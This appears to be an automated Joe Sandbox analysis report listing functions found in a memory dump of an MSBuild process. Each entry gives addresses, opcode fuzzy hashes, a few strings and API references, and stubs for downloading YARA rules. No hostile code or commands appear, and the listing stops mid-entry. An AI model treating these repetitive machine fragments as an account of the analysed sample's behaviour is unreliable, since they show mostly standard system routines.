Function 018C02A0 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction ID: 14f9aa979e5ed6c9589cc5f1c2cc3d3dac14824c6c73fb17e86ab68ac04bb773
Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
Instruction Fuzzy Hash: 06D09239616A80CFD61B8B0CC5A4B1533A4BB44F84F814894E402CBB22E638DA80CA00

Function 018ECF1F Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f1398f5e3f5d2cd8f94f998a313ef136fc1cae050ac98f824005d4397cf518
Instruction ID: 2957001fb6203d084855fc1b5fed53e7f68f5b9f3ebacd4889f9f257a1f7d9c6
Opcode Fuzzy Hash: a9f1398f5e3f5d2cd8f94f998a313ef136fc1cae050ac98f824005d4397cf518
Instruction Fuzzy Hash: 81D0A772111440DFE736CB08CE4AF6577E4FB10B04F4980BCA006CB924C338E905DB80

Function 018EC700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4437e647b2b4e703394cfa8271e7a9dde31e81d5545b5ce8aedd04872345699a
Instruction ID: e1a89271f4c43f35fa7b86844d06f76de209338b8e63099096807f84ed5dc974
Opcode Fuzzy Hash: 4437e647b2b4e703394cfa8271e7a9dde31e81d5545b5ce8aedd04872345699a
Instruction Fuzzy Hash: 8CC01232290648AFC712AA99CD01F467BA9EBA8B40F008021F6048B670C631E921EA84

Function 018AE0D0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820c073d42a7bd8bcef05792f4dec680475f1ef75dda8be65e0ef8600c279020
Instruction ID: a909313374bb1113a83541e311e927c5e095b4dfa0f4544e069c30b128d4ae16
Opcode Fuzzy Hash: 820c073d42a7bd8bcef05792f4dec680475f1ef75dda8be65e0ef8600c279020
Instruction Fuzzy Hash: 71C08CF3B140A0AAC304DB214400B72A18A93E4302BC9C029B199C2148CD39C0009AA0

Function 018D0310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: f2425b3e3b9f6888b1147ec5a76043f91e4a3a6c5fea0d9490ef10571b041d08
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 90D01236100248EFCB05DF45C890D9E772AFBD8710F108019FD19076108A31ED62DA50

Function 018EC7F0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction ID: 377be3678180115cb08b254032d7c41d04bf06b2a340e0212588598e82ab9615
Opcode Fuzzy Hash: 2a93b78b4f3aab30918e7eb6a748612c734bffc3b04e31a2f267280f2c313703
Instruction Fuzzy Hash: 1EC002343016458FCF12CB2DC284A9977E8BB45740B4944D0E908EB721D664ED028B40

Function 018B0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: c7a3178e3ce7ac9d7dbd0124851ff7e116b6bad1a058bd65c5a9dd26977f277e
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 29C08C347005018FCF02CB1DC280F4433E4F700700F000880E804CB721E224EC01CA00

Function 018EC68B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43177cc08b82e6e8226498a7c2379c8a85e47d89b3d8caab50f1f670d5023115
Instruction ID: acbecb1beabe26eed2508fb7ca8b62289783c065fb06279dc967eefdf5e622ca
Opcode Fuzzy Hash: 43177cc08b82e6e8226498a7c2379c8a85e47d89b3d8caab50f1f670d5023115
Instruction Fuzzy Hash: 94C09232151450AFC722EB0DCE85F463BA9FF24B94FC84064B105C25A2C238E921CB94

Function 018EA060 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction ID: b2d934a6dba9c6a3d8453873f6a5c1f67b4e9eb00173a746e7fcc8ce6a92d4f9
Opcode Fuzzy Hash: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction Fuzzy Hash: 3AB012730218809FC71A6F08E940E453765E7C4731F350468B007879608A24DD11D504

Function 0191634C Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction ID: 15533c416e22c145f5f0c7ecda1eb3bdc66aa9ecc3a0b20ddfa1f873330cde9f
Opcode Fuzzy Hash: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction Fuzzy Hash: 56B011B2202880CBC202CB88E088F00B3A0FB00B08F0000A0A002C3A82C228EA008A00

Function 018EA950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction ID: 4238836bcda61e9b12a4d011f4ac92585c7c40db66d6e8b0af18a30fae728e31
Opcode Fuzzy Hash: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction Fuzzy Hash: 1DA011320208808BCB02AB08CA80A00B320BB00A00F8000A0A20082A228A288A008A00

Function 01912BF6 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction ID: 89d7762073d6d43122e5c2f443f1d3ea1fbb0c93491559f3ee5266884b2becaa
Opcode Fuzzy Hash: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction Fuzzy Hash: F4B011B2202C80CBC20ACB08C0C8B0033A0FB00B08F0008A0A802C3B02C22CEA00C800

Function 018E0A50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction ID: 403c77320a157812027a48ce9a4d60f8b9f3cb0574c28afe0cbd08f0fcb5831f
Opcode Fuzzy Hash: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction Fuzzy Hash: 67A02232220880CFCB03BF88CA00F0033B0FB00B00FC888A0B002C3832822CCE00CA00

Function 018F4A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018F4A8F

Strings

0Iv, xrefs: 018F4AFA
0Iv, xrefs: 018F4B04, 018F4B09
0Iv, xrefs: 018F4ADA
0Iv, xrefs: 018F4AEA, 018F4AEF
0Iv, xrefs: 018F4B14
0Iv, xrefs: 018F4AD0, 018F4AD5

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
API String ID: 3446177414-2083360775
Opcode ID: f8eec5581bdbadae1a2ea0ddc415a0e64ed536aca62609d37fc8561edf48bc94
Instruction ID: 6e64a9d94375b394e6f4deadbb136647186fffb39e8771287b598c570cd88e5f
Opcode Fuzzy Hash: f8eec5581bdbadae1a2ea0ddc415a0e64ed536aca62609d37fc8561edf48bc94
Instruction Fuzzy Hash: 31019E32E882205AD7209B2C78087872AE1BB89768FC5005EEA08CF289D6605A49D3D0

Function 018F2890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 018F293C
___swprintf_l.LIBCMT ref: 018F295E
___swprintf_l.LIBCMT ref: 018F29A3
___swprintf_l.LIBCMT ref: 0192A52E

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: 2d85c8a5a6334042acae8ab86891b2e2692351c814aae46c8c3b8db69f1cdf83
Instruction ID: cb31ccd53076ebcc45e97b27b714667dd10f2e1d5ccd08132d14d1bda9352e4a
Opcode Fuzzy Hash: 2d85c8a5a6334042acae8ab86891b2e2692351c814aae46c8c3b8db69f1cdf83
Instruction Fuzzy Hash: B251F4B2A0015AAFDB11DFAC888097FFBB9BB48341B54822DE669D7645D334DF0087A0

Function 018CA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SsHd, xrefs: 018CA3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019179D5
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 019179FA
RtlpFindActivationContextSection_CheckParameters, xrefs: 019179D0, 019179F5

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: 5451d28e8b87951a34e49d0039872192902e95a9b6479b0db83aec68fb0f20b9
Instruction ID: 78553c506c25288dbf4d969b2cc26230e3de90e22ea3dff75cd2bc51cd2280a7
Opcode Fuzzy Hash: 5451d28e8b87951a34e49d0039872192902e95a9b6479b0db83aec68fb0f20b9
Instruction Fuzzy Hash: FBE1D77160430A8FD72DCE68C494B2ABBE5BB84B14F144A2DF956CB291F731DA85CB81

Function 018CD770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0191948C

Strings

SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01919346
GsHd, xrefs: 018CD874
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0191936B
RtlpFindActivationContextSection_CheckParameters, xrefs: 01919341, 01919366

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 4608fa71b9d8691c340ec329daf260aac3f91587b08279ab0514b7f8fb99cbc5
Instruction ID: 4040de5f58e28a3f05607ae3dc6548ada1c3f60669921ae0740191c40adaf4d8
Opcode Fuzzy Hash: 4608fa71b9d8691c340ec329daf260aac3f91587b08279ab0514b7f8fb99cbc5
Instruction Fuzzy Hash: A2E1C574604346CFDB10DF58C490B6ABBE5BF88718F044A3DE999DB285D770DA89CB82

Function 018FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 018FB6BF

Strings

0, xrefs: 018FB695
+, xrefs: 018FB65A
-, xrefs: 018FB650
0, xrefs: 018FB66F

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: 13e78eed7e08392873255255cd602bedfceab93c73e033032d8c3b8e3e90835f
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: A381B170E152499FEF258E6CC8917FEBBB2AF85360F18411DDA61E7291C7349A40CB51

Function 018B9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01912559

Strings

@, xrefs: 018B9175
$, xrefs: 018B9191

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
